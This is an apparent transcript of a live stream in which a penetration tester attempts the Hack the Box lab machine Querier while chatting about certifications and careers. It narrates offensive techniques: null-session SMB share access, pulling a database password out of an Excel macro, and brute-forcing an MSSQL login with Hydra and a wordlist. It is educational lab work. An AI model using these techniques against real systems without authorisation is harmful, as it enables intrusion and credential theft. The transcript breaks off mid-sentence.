Hello, hello. Welcome to the stream. Thanks for stopping in. Glad to see you here. Today we have another Hack the Box live stream. Today we're doing Querier. I don't want to call it Querier or Courier. Maybe it's Courier with a Q. I don't know how to say it. But I'm booting up my VM now, guys. And once I connect to the VPN, I'll go full screen. I think it was Wi-Fi Addict said that when you connect to OpenVPN, it reviews your public IP address. I looked at the logs, I couldn't find it, but then again, I don't really even know my public IP address, I ain't gonna lie. But yeah, I'm gonna connect to it, and then once I connect to it, I'll share my screen, guys. And then we'll spin up the box, and then we'll start hacking at it. Furthermore, this stream is actually going to be the first ever black box stream that I've done on a medium machine. So I've been doing a bunch of easy machines black box because I have time to do them in one stream. And this isn't my first medium box. I've done plenty of medium boxes, right? And I've even made videos about some medium boxes for Try Hack Me, but I haven't done one that's black box live. And I think that's interesting. And the reason I'm doing one black box live, there's actually several reasons for it. That one second, we can't connect my VPN. What's up, Mark? Thanks for stopping in. Glad to see you here. How you doing today? Impressive search, thank you. Lab? Maybe that's it. Okay, I think I am ready to show my screen, guys. Let's go ahead and dive into it. I'm going to play my disclaimer real quick. This demo is for educational purposes only. Ethical hacking is legal and differs from illegal hacking. Always ensure you have legal permission before performing what you see in this demo. This was from the last stream. We can close out all of this. I hate how Firefox closes your session or resumes your session. I wish it would like not remember like what I did last. I mean, I'm sure it's a setting in here, but like by default, it should be like, yeah, here's a clean slate. Like I hit the X for a reason. Now, if it shuts down unexpectedly, that would make more sense for like all the old tabs to pop up. But it's like, I hit the X because I was done with that session. I don't need to see the 40 tabs that I had open from the last hacking session, you know? Alright, so let's go to hack the box. I don't know why that's not in my history. Let's go to not hack the box, hack the box machines. Hack the box login. There we go. Just work on OSCP challenge labs. After these labs, join Hack the Box. Nice. What labs are you on right now? I know there's... Oh man, I forget the names of all. I know there's MedTech and Rely. I've done a lot of those. And then I've also done Valentine's Day special only. Oh, is that a... I didn't know there was a Valentine's Day box that got retired. Where's it at? It said Valentine's Day special. Valentine's Day is long past. I don't see no Valentine's Day box in this list. It said free retired. Was it easy? It doesn't matter. Sort by release date. That's weird. Anyways, let's go ahead and search for the one I planned on doing. ABC, Zeus, Poseidon, Feast, and Laser. Oh, they added Laser, that's right. And Feast, I think that's a new one since I've been on the platform as well. I know Zeus and Poseidon, I'm pretty sure those ones are like above and beyond. Like, I think if you read the thing, it says like those are two. Skylark, there you go. I didn't touch Skylark. Skylark is part of like the base. When I say base, like I said, I'm pretty sure Zeus is actually the easier one. Poseidon, I think, is the one where like they say Poseidon's above and beyond. Like, I guess is above like their course. Like, you know what I mean? I don't know. I have to go back and look, but that's cool. They keep adding labs. Because when I went through OSCP, there was MedTech, Relia, Skylark, in OSCP, Mock, A, B, and C, and that was it. And then I went back and saw that they had Zeus, and I think I completed Zeus, if I'm not mistaken. And then Poseidon, I went to go dive into it, and they were like, I was like, yeah, this is like above what we expect out of you in the exam. Like, this is like a thing you should do to bridge a gap between OSCP and OSEP. Feast and Laser, I don't remember those, so those must be new. Are Feast and Laser, are those like, what's the difficulty on those? Did they say about those? Are they considered like extra credit, or are they like part of the core? What's up, Delta Kilo? Thanks for stopping in. Glad to see you here. How are you doing today? All right, so the first I think Rust. What is Rust scan? Is it -A for address and is it -R for range? That's what it is. -A for address, -R for 1 through 65,535, and the address is whatever this IP address is going to be. So while we're waiting for this to boot up, so the reason why I chose this box is for several reasons. One, it's part of the TCM Security Privilege Escalation, Windows Privilege Escalation course for beginners, and I'm doing that course. Now, I can't stream that course, but this is part of the course, but it's also Hack the Box, and I can stream Hack the Box. So I'm going through that course, and this is the next machine on my list that I got to do. So that's one reason why I picked it. The second reason why I picked it is because I've noticed that the old medium machines are actually easier than the modern easy machines. So I'm expecting, well, I don't know if I'm expecting this to be easy, but I'm expecting me to be able to like do this without too much of a struggle. Let's see what happens though. All right, so we got our IP address here. Paste this in here. So for those who don't know, Rust scan, super fast port scanner, uses Nmap in the background. You can see we got 135 open, 139 open, 445, 1433, 5985, and these are probably all RPC. That was really fast. Let's go ahead and run this one more time again because it's so fast sometimes it misses ports. Grebo Demon. Thanks for stopping in. AKA Bastion. I remembered. He said, "What's up, Kyser? Have you ever solved challenges insane and hacked the box?" And the answer to that question is yes. Multiple, actually. Several. I mean, a handful. However, with a caveat that I worked with a team. It wasn't all me. It wasn't all me. Did I solve them? Did I do the exploits? Yes. Did I discover every single aspect of the path? No, because I was working with a team. And that's where the power of working with a Hack the Box team comes into handy. What's up, Julio? Thanks for stopping in. Glad to see you here. Did I run that again? It already gave me the results that fast? Alright, so we got... Okay, cool. So let's go ahead and copy this. I think 135, 139, this looks like about the same. Okay. Next we have... Let's do... I have a little script here to do this. So we got Python 3. Python 3. It's in my script folder. Scripts. Open ports.py. Before I do that, change directory, hack the box, make directory, Querier, new directory, Querier. I think that's how you say it, I don't know. Zoom back in so you guys can see better. Alright, so I gotta do nano open ports.txt, paste this. Actually, no, we'll move that open ports to nmap.txt. And then what we're going to do is we're going to run this script open ports.py that takes, if we cat the nmap.txt, it takes this output and it's going to give me a comma separated list. You'll see how cool this is. So this is in hack the box, Querier, and nmap.txt, and you see it gives me a nice neat list that's separated by commas. And then I can do nano open ports csv.txt. We'll just put that in a file for later if I need it. But the reason why I like this output is because, oops, I didn't copy it all. Is because when I do it in a deeper nmap scan, not NAMP, nmap -a -pn -p, and then we are going to paste all the ports. That's how that's the input nmap like. So you have to do this comma separated like this. -p, and then I want to do the IP address. And for those who don't know, -a is all, so it does operating system detection, service version detection, and it does the scripting engine. And then we also have PN, which skips pings because we know the machine is alive. And then we'll do that. Yeah, 5985 is evil WinRM, which might come into play here if we get a hash or something. We can pass a hash and log in. That's one of the main things I use when I see that open. Or if we get credentials, I'll log into it directly as well. We do have SMB open, so we can actually use SMB map like you said. I wanted to get that running, that scan running first. So we can do SMB map. Break the syntax almost all the time. I don't know why, but I do. So we're gonna go to my GitHub, github.com/Kyser Clark, and then we're going to get something out of my notes here. Hacking notes. It's in my EJPT notes, and then it's in my enumeration section, SMB, and then we can click on SMB, not SMB client, I want SMB map. Well, before we do that, we can actually, so this is a syntax I actually do know. It's just enum for Linux. Oh my gosh. Enum for Linux. Is it just enum for Linux and then the IP? Yeah, that's what it is. Easy enough. Enum for Linux. We'll grab our IP address here. Like I can't even remember. The syntax is so easy that I forgot it was so easy. The difference between mass-scan and nmap, and is mass-scan fast? Yeah, I mean that's really the biggest difference is the speed. Mass-scan's faster. I still use nmap because I would venture to say it's more reliable and it's less likely to DOS a system. It allows sessions using username nothing, password nothing. Oh, that's perfect. That's exactly what we wanted. Candidate got OS info, didn't get anything there. SMBV1, okay. Cannot request session. Access denied. That's weird. Okay, that's fine. We can do SMB client. So we'll grab this command here. And we will do a null session login with SMB client. Like so. Then we'll see what happens here. Looks like it froze a little bit. Oh, there we go. Okay, that works. So we got reports as a share. We got the admin share, we got the C share, and IPC share. So let's see if we can use reports. So now what we need to do is we need to grab the next command down, which is a null session login with where we pick the share. So we will do this. Copy our IP address again. Paste that right here for the target IP, and then for the share we want to do reports, and we are in. So if we do ls currency volume report xlsm, so let's do get currency volume report xlsm. Let's see what this file contains. Let's do get, put that in quotes. Alright, now if I do an ls, it should be right here. Yeah, let's go ahead and move currency volume reports to hack the box Querier, and change directory to hack the box, oops, Querier, and then clear that out. So we should have currency volume report. So if we do cat currency volume report, what is an XLM file even? XLSM, what kind of file is that? XLSM file extension. What's up, Taha? Welcome to the stream. Thanks for stopping in. Glad to see you here. Oh, that's Excel. What do I... That's macro enabled. Okay. Oh, wow. I should have known that. So it's an Excel file that's macro enabled. Let's see if I can... Let's just open this up in Excel here. Let's go ahead and I want to transfer this to my actual Windows machine. My host running this VM here. Well, actually, I probably don't even need to do that. Let's go to Hack the Box, Querier. I think we should be able to just open this. Archive type not supported. Okay. Let's go ahead and copy this. I want to transfer it to my host machine. And then I'll open it up. Alright, so here's what I got. We got nothing. Oh, here we go. Oh, oh no, those are some. That's from a different. That's from my actual lab. Those are hashes from my actual lab. My Windows lab that I was doing. That is not. I actually want to close. I don't know why it wanted me to open that. Okay. What's up, Cody? How's it going? Thanks for stopping in. So, macros have been insane. So there's macros in here. I don't want to run the macro on my host machine here, but this might be the way into the machine. Is a macro enabled document. So we'll keep that in mind. That's a lot of steps that I don't feel like doing, but it might be the way in. What's up, Trey Black? We're on the stream. Thanks for stopping in. Okay. Let's go ahead and clear this out. Alright, so we got the reports. Let's exit this and then let's see if we can try to log in onto a different share, see if there's anything else. So we got that one report. So let's go to admin, see if it gets us anything. I doubt it, but it's always worth trying. Unzip it? It's not zipped. What's up, Luca? Thanks for stopping in. Access denied. Yeah, I figured. Let's try to go to the C. Access denied. Figured. In IPC, generally nothing, but it's always worth checking out. So LS in here. Nothing. Okay, let's just leave. Okay. So we got running these ports. So we got RPC run. We kind of knew that. We already knew SMB is running. This is a Microsoft SQL server. (2017-14). This might be a vulnerability. Let's look that up. Microsoft SQL Server 2014 exploit. 2017-14 exploit. Well, this couldn't possibly be the right one because this is from 2000. We got an HTTP server running on 47,001 and 5985. That's WinRM, so probably not an HTTP server. Let's try to see if we can go here. 47001. Is it 3 zeros? 2 zeros. Nothing. HTTPS://. Okay, nothing. When you unzip it, it becomes normal. Interesting. I don't know. I think the macro might be the way in. That or some Active Directory attacks we can try here. This is looks like it's part of a domain, so we could try some Active Directory attacks. See if our spawner will just give us something. I guess that's worth trying. See if we get anything. I mean, it's worth a shot. I doubt it. This is a CTF, but you never know. You know, another thing we can try is we can try good old Nessus. So I have an actual alias to run Nessus. What is the port for Nessus? I always forget. It's like 83 something. This is the free version of Nessus, by the way. 8834. I knew it was 34 something. Oh gosh. Add request. Because I gotta put HTTP in front of it. HTTPS. There we go. So yeah, this is the free version of Nessus. So we'll see if it does a cool vulnerability or not. I taught myself how to hack without Nessus because OSCP doesn't allow Nessus, but when you already have OSCP, you're like, well, it's not a restriction in the real world. Matter of fact, we use Nessus on every pen test. Alright, let's go ahead and do a new scan. Just gonna do a basic network scan. For targets, by the way, if you don't know how to use Nessus, this is a good tutorial on how to use Nessus right here. So targets, we'll put that in here. The name of this machine is Querier. Querier, that's what it is. Querier, we'll do a network scan, and we'll just use the same name for description. And then we're going to go to discovery. We're going to do custom for the ports. We're going to port scanning, and for the port range, we want cat. Oh, okay. We need to move. Open ports.txt here, and then cat open ports. So here we go. So I only want to scan the ports that we know are open, so it doesn't scan forever. And then consider unscanned ports as closed. And that's all we gotta do here. You can configure it more, but this is all I'm looking to get. Oh, I backed up on accident. Dang it. Oops. Oh, gross. Okay. What's up, Fireball? Fofo? Am I saying that right? Thanks for stopping. Glad to see you here. What's my career position? I am a full-time penetration tester. I work as a penetration testing cybersecurity consultant. Alright, let's do... Oop, that doesn't go there. That goes here. And the targets, the IP address does. Querier. This is a network scan. And then same thing for description. For discovery, we will do custom ports. Port scanning, we'll consider everything unscanned as closed. And the custom range. Okay, why can't I paste that? There we go. And then hit save. And we will launch that. And next thing we're going to do is we're going to do a new scan. And this time we're going to do a web app scan. It's always worth doing a web app scan on it as well. Even though I don't think any web apps are on it, but it kind of is. There's two, it kind of is, so it's really worth checking out. We'll put the IP address here. We'll call this Querier web app. And I'm not configuring this anything more than it already is, so we'll just leave this out all defaults, and then we'll run the scan. So now we got these two scans running. Oop, that's the wrong one. Stop, I don't want to run. Oh my gosh. Launch. Why did the order of these get all whacked? Okay. Querier network's running. I want to run Querier web app. You see, these are some other boxes that I've done. I should probably just delete them so I don't accidentally run them again. It don't matter, they're not online. What's up, Cypher? Thanks for stopping in. Glad to see you here. What's up, Joshua? Thanks for stopping in. You love this? Thank you. I'm glad you are enjoying the stream. Alright, so we're going to run Nessus. See if we can get any easy wins that way. And I think that the open share with the reports might be the way in, guys. I gotta do Green Engineer. Thanks for subscribing on YouTube. I appreciate you. What's up, John V? Thanks for stopping in. What's up, Green Engineer? Thanks for stopping in the chat. How you guys doing today? I learned you are a vet, so am I. Yes, I am. What branch was you in, and when was you in? And what'd you do? I kinda just want to wait for these to get done. I forgot how to make macros, dude. It's been a minute since I've done it. I'm trying to find my notes here. Let me see if I can find it. Before I even look this up, we need to make sure it's even possible. Nothing on responder. We need to make sure it's possible to even put a file. Change directory, hack the box, Querier, and then we're going to do ls, and then we're going to log into that share again. And then we're just going to do something simple. We'll just put this nmap.txt. If it lets me put nmap.txt in there, then we know that we can put files on the share, which I'm thinking we can if we can log in with a null session and read the files and download them. Should be able to put a session, put a file here too, but you never know. But access denied. Put to hack the box slash QUERIER slash wrong slash nmap.txt. Does not exist, so it doesn't let me. It doesn't let me put files. I was in Army from 2016 to 2019. Worked as an intel analyst. Nice. Nice. So are you working in cybersecurity now? Did you transition out of intel analyst to like cybersecurity? Or are you still doing intel type stuff? Maybe threat intelligence? That's like a combination of intel and cybersecurity. Best of both worlds. But yeah, I joined the Air Force in 2018 and I got out in 2024. Which is just last year. My DD-214 anniversary is next month. I haven't even been out a year yet. Well, I guess in a way I have been out a year because my terminal leave started over a year ago, if that makes sense. But not counting my terminal leave, then I haven't been out a year. I haven't had my DD-214 for a year. Yes, I'm cybersecurity analyst now. Was a network engineer before. Only been in security since mid last year. Oh, nice, nice. Did you see the new Hack the Box? Not Hack the Box. Try Hack Me certification. By the way, guys, if you have the CYSA Plus, if you go to my LinkedIn, you can see my repost. But if you just Google like free SAL1, that's the name of the new Try Hack Me certification. I have a video about the new Try Hack Me certification dropping on Saturday, and if you don't want to wait, you can always become a member and see it now, because members get to see my videos before they go public. But that video is done and complete, and it's sitting in my YouTube queue to release. And like I said, my videos drop on Saturdays. Anyways, as soon as I did that video, I literally made it last night, and then today, Track was like, yeah, if you have a CYSA Plus or you have a Blue Team Level 1, you can get a free voucher for the new certification. By the way, the new certification is called Security Analyst Level 1, SAL1. Yeah, you have until the 31st. Got to take my 2 exams by the 31st. Oh, that's right. You do get a free retake. I was going to wait till the last minute and just take it, and then if I failed, I failed. Which, honestly, I'm probably going to fail, dude. I'm not a cybersecurity analyst, guys. Like, I'm probably going to fail it. I get it for free because I have the CYSA Plus. If I pass, that would be cool. If I pass, that'd be cool because that just tells me that I'm good enough for an entry-level cybersecurity analyst position, which I think I am, but dude, I don't do cybersecurity analyst work, dude. I'm a pentester, you know? There's a different skill set there. I think I'll absolutely crush the multiple choice section of the exam. It's multiple choice. It is. And a simulation, yeah. Yeah, like I said, I know I made the video. I figured you guys already saw it. It's not even out yet. Unless you're a member. You can become a member. You can subscribe. Become a member. Then you can watch it now. But, yeah, it's multiple choice. There's 3 sections. Multiple choice. Then there's 2 SOC simulations. The 2 SOC simulations are 40% of your score each. So 80% total for the hands-on component. And then 20% of your score goes towards the multiple choice questions. So the multiple choice questions constitute 20% of your score. But as I was saying, I think I'm 100% confident that I will absolutely crush those multiple choice questions, and hopefully the SOC simulations are kind of easy and I can just get the cert. But if I don't get it, I'm not sweating it, dude. Like, I'm not a SOC analyst, you know. I'm more focused on hack the box, CBTS, and OCP, but I'll say F it and try it out. Yeah, that's what I'm saying, dude. My work provides offsec training and unlimited offsec cert attempts, so I've been doing their OSDA cert. Oh, nice. I was going to do that. I got like, I don't know, 15% through of that course, and then I backed out because I also have offsec unlimited subscription, but I paid for it myself when I was transitioning out of the military, and I only had 2 months to get the cert. I'm like, there's no way I'm gonna complete all this training and get this cert in 2 months. I just didn't think I had it in me to do it in 2 months. If I would make as much content that I do, I could easily do that in 2 months. But since I spend literally half my time making content, that I just didn't have time to do it. So I just stopped pursuing it. I'd like to get one of those blue team hands-on certs, maybe the one from the Hack the Box or the one from OffSec, but like Cody said, my focus is on the offensivesecurity stuff because that's what I do full time, you know. How long did I study for OSCP? It took me like 80 something days. I want to say 87 days from the time I started the course to the time I passed the exam. Maybe less than that. It might have been high 70s. It was less than 3 months. Which is that's an insane deadline, but I I did like 3 to 5 hours a day of studying every single weekday, and then like 10 to 12 hours a day on the weekends. And I took very few of those days off. Very few. Like I was mentioning you earlier today, Cody, and I said that, you know, maybe 1 out of 10 days I'll take a day off and not study. Or a lot of times nowadays, like I just won't study the full. I'll just put an hour of study in, and rather not the full 3 to 5. You know what I mean? Yeah, I did it one try too, which is actually crazy. It's a kind of a miracle, to be honest with you. The I wanted to see if I can get it done in 90 days because that was like the base package. Even though I had the limited subscription, I wanted to see if it was possible to get it in 90 days, and it's possible. But I'm just ranting at this point, guys. We're not even playing the machine. Sorry, you guys ask me questions, I get going. I can't multitask, guys. I am not a multitasker. This is why a lot of the messages that people send me go unread. Because the second I open one up, I'm like, I'm sucked in. Let's look at these Nessus scans. We got the network scan back. Let's see what we got. We got critical here. That's interesting. Let's see what we got. SSL, medium strength sacred suites. Oh wait, I thought I said critical. No, we don't. It says we have 11 criticals. Where? It should be. No, it says 4 critical. How do we have 4 critical? I don't understand. It just says high. It says medium. I don't know how it says 4 critical over here. I really don't. Oh. Well, I was saying 1 high here. Oh, here we go. It updated it. It was saying 4. Now it's saying 2 critical. Bro, this circle over here is jacked. What's up, Red Cyber Noah? Thanks for stopping in. Did you start with Try Hack Me Labs first or Hack the Box? It was Try Hack Me. I did a lot of Try Hack Me before I got into Hack the Box. But anyways, I was saying, like, yeah, OSCP, it's definitely possible to get in 90 days. It's just going to take a lot of time and effort, and your social life goes out the window. You got to be committed to it if you want to get it done in 90 days. And it's actually my most viewed podcast episode, the Hackers Cash podcast. My most viewed episode on YouTube, anyways, is about that exact topic. If you guys want to check it out, I was talking to when did you get to the point you didn't need to look at walkthroughs during machines? I mean, I still do it. I still look at walkthroughs, dude. I'm pretty sure I looked at a walkthrough the last Hack the Box stream. I still have to. I would say very rarely do I pass a machine without having to use a walkthrough. And it's not that I need it, it's just that I just get impatient sometimes, right? Like if I'm stuck for 2 hours, I'm like, all right, well, let me just see the answer. Now in the OSCP, I was stuck on a machine for like 5 hours straight, and there's no walkthrough, so you have no choice but to try hard. I figured it out eventually, and I think I can figure out most machines eventually, but when it comes to like a Hack the Box machine like this, what we're doing now, like I'm not gonna sit here and try this for 5 hours. Like if I try for 2 hours and I'm stuck, I'll look at the write up because I got other stuff to do. You know what I mean? But when you're locked into the lab, it's like you have no choice but to try harder. So I had the capability to try harder. I just more times than not, like I said, I cap it off at a 2 hour limit. And that's my recommendation for OSCP. Like if you're stuck for 2 hours straight, go ask for a hand in the OffSec Discord. Astrological Cube? Is that how you say it? Astrologic Cube. Thanks for following on Twitch. I appreciate you. I'm the same way, just make sure I wasn't the only one. Yeah, man. I mean, I made a video about when I passed 100 hack the box machines. That's one of the tips I made. Don't be afraid to look at write-ups. Don't be afraid to use this guided mode either. Like, well, you might even see me use guided mode here if I get stuck too bad. But I'm not really stuck too bad because I'm not trying hard right now. Because you guys keep asking me questions, which is I'm okay with. I'm not mad about. Like, that's what these streams are for you guys asking questions. Actually, I enjoy talking to you guys more than I do the actual hacking, because I do enough hacking off stream, right? Like, I spend way more time hacking off stream than I do on stream. Did you find and learn way more doing the machine slash walkthroughs than reading typical modules? I'm not sure what you mean by that. This is your first Twitch video watching? Nice. By the way, guys, I want to make it, since we got a lot of people here now. Well, a lot. We have like, according to my stats, we have 11. That's not that much, but I think it's more than my average. We have a handful of people from all the platforms. So for those who don't know, for those who are new here, I stream on Twitch, YouTube, LinkedIn, and Kick all at the same time. So if you see me replying to a comment that you don't see in your chat, I'm talking to someone on one of the other platforms that you're not on. You never seen so much material shoved in a course like offensivesecurity does their courses? Yeah, I mean, it's a lot. 100, yeah, for sure. 100%. They give you a lot at once. Curious to learn about coding, how that world works. Coding is good to know in cybersecurity for sure. I have a couple videos on coding. I have one dedicated specifically to coding, and I mentioned in one of my podcast episodes, and actually the title of that podcast episode is related to coding. It's actually one of my more recent ones. It should be pretty easy to find if you're interested in that. Now, the whole episode isn't about coding, but I thought the biggest hot take in that episode was about coding, so that's why I made it the title. Working as a security analyst now, but I really want to transition to pen test role in the next 3 to 5 years. Working on track me now. Plan on getting some certs along the way. That's the perfect plan. You can definitely do it. You know, with I would say 3 to 5 years of cybersecurity analyst experience is definitely, if you get the right certs, definitely an entry. I don't want to say entry level, but an entry into pen testing. There's really no such thing as entry level pen testing positions. There are, but I would say more times than not, like, you gotta have 2 years experience of pen testing, and eventually you'll find someone to take a shot on you, but prepare to get rejected a lot. Because I had 6 years of cyber defense experience, OSCP, and I think 11 other certs at the time, and I got several rejections, man. Let's go back to my MF scanner results here. I'm actually stuck. Because Nessus didn't give me nothing. There's no vulnerabilities that we can just quickly do. Cypher Suites, I don't care about these certificates. These aren't SMB signing, not required. TLS says it's nothing we can exploit. Yeah, there's nothing here. In Nessus. The only thing I can... We got a SQL server. Let's just try to log into the SQL server, dude. Oh, we got MySQL. I don't have SQL Server. How can I... How do you log into a SQL server? Let's open up ChatGPT. I gotta log in. Hold on a second, I'm gonna log in real quick, guys. To my ChatGPT. Guys, I'll be right back. I gotta get my multi-factor authentication, which is on my phone in the other room. I'll be right back. Quite frankly, that's actually my least favorite thing about multi-factor authentication, because it's like we got all like the Authy apps and like the Google Authenticator and all these authentication apps on our phones. But I don't like to have my phone on my desk because it's just a massive distraction. So when I had to do a login, I had to get up and go to the other room just to log into something. Check my notifications. Oh, okay, I don't have a notification. There we go. I have GCFA. I don't know what cert that is. Pentest Plus, CUSA Plus, ECDFP. I think that's e-learning security certified defensive forensic professional. I'm assuming that's what that means. Certified professional penetration tester V2, EJPT. ISACA certifications. I gained 2.5 years, and I am working as a SOC security analyst. What do you think about my progression? That's a good progression. I mean, if you're trying to become a pen tester, then, well, I'm not sure what your goals are, but I mean, yeah, a handful of certs and 2.5 years of experience, that's good. How often do you use your ChatGPT during your actual pen testing job? Literally every day. Literally every day, several times per day. Alright, let's go back to
This demo is for educational purposes only. Ethical hack.
Can you guys not see that again? Alright, so what was I gonna ask? Oh yeah. Yeah, because I don't memorize syntax stuff, so I don't what command syntax do I use to log into Microsoft SQL Server from Kali Linux? Dude, this is my new Google. Like, it just tells me what I gotta do. Like, it's so fast. Like, you cannot get the answer to this fast on Google. You just couldn't. So since I gotta install MS SQL tools, alright, well, let's do that then. And then it's telling me to do this. Okay, is there a way to do a null session? Is there a way to do a null session for MS SQL. If no, also, what is the default admin/root username? Let's see if we can do a null session login here. Alright, so let's go ahead and clear this out. Paste this. But yeah, I mean, ChatGPT changed the game. Because, I mean, I can definitely work with ChatGPT. I did it for years when I was in cyber defense operations in the Air Force. And OSCP bans ChatGPT. So, and they watch everything you do. So I definitely passed that exam without ChatGPT, but outside of that, man, like I'm using it. It saves so much time. Like I could definitely Google this and find it, but it's gonna take me 5-10 minutes to find it. What was I doing? Oh yeah, I gotta get the IP address. Paste the IP address here. See if we can. What do you mean SQL CMD? Is that not long? Okay. I hate working off one monitor, guys. That's another thing that really slows me down for these streams. I have 4 monitors, so normally I just have like everything split over at once. But I can't show you guys 4 monitors at once. Wrong directory? I don't know. I'm just gonna manually install this like it's telling me to. I already did an app update, I thought. Maybe I didn't. Try to connect PowerShell console and Kali. What do you mean, like the WinRM? I could try, but I don't have a username. I mean, we could try admin, but now we can go straight to admin. None found. Okay, I just broke that. Bro, okay, This is all broken, dude. This is one thing that sucks about ChatGPT. Said, how can I help you today? Bro, it's broken. ChatGPT will sometimes break your stuff worse. Use a sock-based reverse shell? For what? What is it talking about? See, this is actually the worst I've ever seen ChatGPT. I've never seen it be off the radar this much. Like, I don't want this. I'm not. Okay. I just asked if I can revert these settings because it broke. It broke everything. I can't even do an app update anymore. Bro, what are you talking about? Start a new chat, I guess. I don't know. I think ChatGPT is broken today. Like, it's actually down. Can you fix this here? It literally... It doesn't understand it. Hold on a second. Is this my VM being done? I doubt it. Okay, so it's working on my non-VM, so we'll just pull this window down. Anyway, I have update now. Alright, there we go. Fixed. Goodness gracious, man. Let's go ahead and ask it. How can I log into MS SQL from Kali Linux? Using Impact as MSQL client. Oh. Yeah, the VM on, sorry, the ChatGPT in the VM isn't working. Okay, so it's giving me a way better answer here. That's weird. SQSH. Do I got this installed already? I already have it installed. So we just need to run this command here. Start doing a null session and see if that works. That was really frustrating.
Access granted.
Martin Stoiko. Thanks for subscribing. I appreciate you. And welcome to the channel. What is the default user for MS SQL? It's either admin or root, but it would be nice to know. Is SA. The SA account. Login failed for user SA. Okay, well, that didn't work. Let's try admin maybe. Login failed for user admin. Oh, I'm giving it a null password. I don't know. Let's see if I can get like a Hydra. I don't know the syntax for Hydra, so I'm going to look that up. Well, is MS SQL a service we can try? Let's try Hydra-H. Well, let's just try this. The full screen. Probably way off track here, but I figured like might as well brute force this login if I can, right? You should be using O3 Mini High. Is that like the $200 a month plan one? We use RockU here. We'll provide a username of SA. And then can I just do MS SQL? Will that work? Nice. It's actually took that as an argument. Perfect. We'll see if that gets us anywhere. Nothing on responder. I'm kind of out of ideas, guys. I mean, I thought the macro thing was kind of interesting, but I forget who someone's in the chat in the stream said to unzip this. I don't know what that does, but I mean, we'll try it. Unzip. How do you? What does it extract here? Cannot. Okay. Extract here. So let me extract nothing. What if we change directory to back the box Querier. So we want to unzip this. It's not even zip, but I'll take your word for it that this works and does something. Content types, docs proc. I don't see anything in this information. Last modified by Lewis. Oh, that's a hint, I think. That's a user. Last modified by Lewis. That might be a way in the machine. We have a username. That's interesting that we got that information out of that. So Lewis is a potential username here. That's pretty cool. I didn't know you can just unzip that and get that. Change directory to this one so we can get some more information out of this. Nothing in this directory. So we'll go to XL. Cat styles .xml. Cat workbook.xml. So we got anything in here? You know, it might actually be easier if I did it like this, rather than catting these out and just clicking these and viewing these. Like, that's so much easier to read, right? Nothing in that. Okay. Creator Lewis. So we already found that, but this is a way better way to read these documents, so we'll keep doing it this way. So we had workbook XML. See if we got anything here. UID. That seems kind of interesting, right? Code name. I don't know what that means, but that might be interesting. I don't think so. It doesn't look like it could be a hash. It might be. I don't know. Came from Lewis's desktop. So Lewis is for sure a user on this box. 100%. So we might be able to brute force his login to get in, maybe. But if we can find a password somewhere, that would be nice. What's this? I can't really do. That's the macro. Sheet 1. It's a different UID. Codename sheet 1. I don't think it's, yeah, I think the codename UID, I don't think it's relevant to us. Theme 1. Doesn't look interesting to me. What's up, Morgan? Thanks for stopping in. XML leads to JSON. Yeah, but how can I use that to my advantage? I think let's do this. Let's change this from MSSQL to WinRM and change the user to Lewis. Is WinRM not a service we can use for this? Well, let's try to do the MSSQL server with Lewis. See if that does anything. We might be able to brute force Lewis on SMB to the admin share, maybe? Maybe he has access to the admin share, you know? It's always worth trying out. Let's invalid reply. Okay, I guess I can't do SMB brute force. I'll be right back, guys. Alright, I'm back. Thanks for your patience, guys. So we didn't get any passwords here. Still nothing on responder. Or I don't know what else to try. I don't see any other. I don't see anything else to try. Let's check the web app. Let's check the web app. Nessus scan should be done by now. See if we got anything interesting here. Nothing. All informational. Nothing useful. Okay. So I'm actually out of things to try. I'm gonna just get a guided mode and see what happens here. Normally I'd try to stick it out for 2 hours, but I genuinely do not know what else to. Was the non-administrative share available on Querier or SMB? Reports. We found that out. Reports. Okay. What is the password for the reporting user on the Querier database? What is the password for the reporting user on the Querier database? Oh, I don't know. How do we get the password? I looked at all these files. Let's go ahead. Analyze the macros in Excel workbook. This can be done by unzipping it and running strings. But we unzipped it and I didn't actually look at the macros. I should have done that. That makes a lot of sense. So we should be able to just do this. Strings VBA project bin. Ha, there it is, password. Nice. Okay, well, that's where we messed up. We just needed to. Oh shit. Paste it wrong. Okay, put that in my notes on the other monitor. So we got Lewis with this. Let's just see if we can log in with Evil 1RM, man. Evil Win RM? Is it Win Dash RM? Evil Dash 1RM. Dash. I forget the syntax for this. I'm gonna look this up real quick. It's in my notes. See if we can just log right in. Password is this. User is Lewis. Target IP. Dude, hopefully that works. If not, we can try to log into MSSQL. Or maybe even SMB. I have to put a slash here, I think. I don't know. Login failed for user Lewis. Well, let's back to my GitHub here. -U for username. Grab our IP address. It'd be interesting to know where this password goes to. I guess we could read. Oh, maybe not. It's just SQL Server. UID reporting. Oh, I wonder why I can't log in. I'm using the wrong user, dude. Is it reporting with a capital R? No, it's a lowercase r. Reporting with a lowercase r. And then we'll paste that password we got. Login failed for user reporting. Well, that's not what we wanted. User ID reporting. Password equals this. Maybe this is a hash. Is this a hash? This could very well be a hash. Couldn't identify the hash. Let's see if we can try something like nano reporting underscore hash.txt. Paste that. John does a pretty good job at detecting hashes, so if we just do like a John, let me get the syntax here. No password hashes. Okay, so it's not an actual password. It says UID reporting. It says for the SQL server. Let's try to do reporting for the user. Let's see if that gets us in on the actual machine and not just the SQL server. I can't believe that it doesn't work anymore. Huh. Is that the right password? That's the right password, but where do you use it at, dude? What user is the Microsoft running as? Reporting? No. Lewis? No. SA? Huh. Connect to the database using XP Direct to get it to authenticate to you. I've never even heard of this tool, let alone used it. Damn it. I don't know what that means. Connect to the database and use XP. What does that even mean, bro? Okay. But how do I connect to the database? Try each name until one works. Okay, so let's try to do this. plug in our IP address here and see if this works. So I'm gonna go off this list right here. I'm just gonna move some of them on so I can just do rapid fire this. Admin MSQL. Root. Yeah, I don't know how to do this. Let's try to get the write up. I don't know how do I connect to it when I don't know the username, you know what I mean? That'd be nice to know. How do you connect to it? MSSQL without a username. Oh, it says reporting. It didn't work earlier. Reporting. What do you mean, bruh? Why does it not work for me? That's exactly what I tried. Reporting. I guess I gotta do dash windows off. Dash windows. Is it dash windows? Dash off. Still failed. Is it worth paying for Hackbox? I can barely do it without assistance. I'm not sure if it's worth it yet. I don't think you get the write-ups unless you pay for it. But I mean, there's definitely write-ups you can find just by Googling. But do you get guided mode? I don't know. This guided mode is really nice, to be honest with you, because it's like it's just a little nudge, you know, just a little hint. It gets you going in the right direction. I don't know if do you get guided mode on the unpaid versions? Because if not, then I would absolutely pay. I pay because I like having my own separate. I pay for the VIP Plus, which is $20 a month, which is absolutely worth it in my opinion. Because I mean, as much as I use it, I don't even use it as much. I should be using it more, but just having my own box without other users, sharing it with other users, and I can spin up any box that 